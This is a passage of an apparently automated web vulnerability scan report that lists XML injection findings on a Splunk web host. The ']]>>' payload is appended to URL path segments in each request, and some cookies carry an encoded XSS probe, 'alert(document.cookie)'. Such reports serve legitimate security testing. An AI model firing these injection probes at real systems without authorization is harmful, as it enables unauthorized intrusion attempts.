HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:34 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib]]>>/Myriad_Pro_Regular_400.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:37 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js]]>> HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:39 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes]]>>/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:27 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com]]>>/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:29 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts]]>>/js/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:31 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js]]>>/contrib/Myriad_Pro_Semibold_600.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:33 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib]]>>/Myriad_Pro_Semibold_600.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:36 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js]]>> HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:37 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets]]>>/v5/homepage HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:14 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5]]>>/homepage HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:17 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage]]>> HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:48:19 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets]]>>/v5/homepage/homepage.hero.css HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:00 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5]]>>/homepage/homepage.hero.css HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:02 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage]]>>/homepage.hero.css HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:05 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage/homepage.hero.css]]>> HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
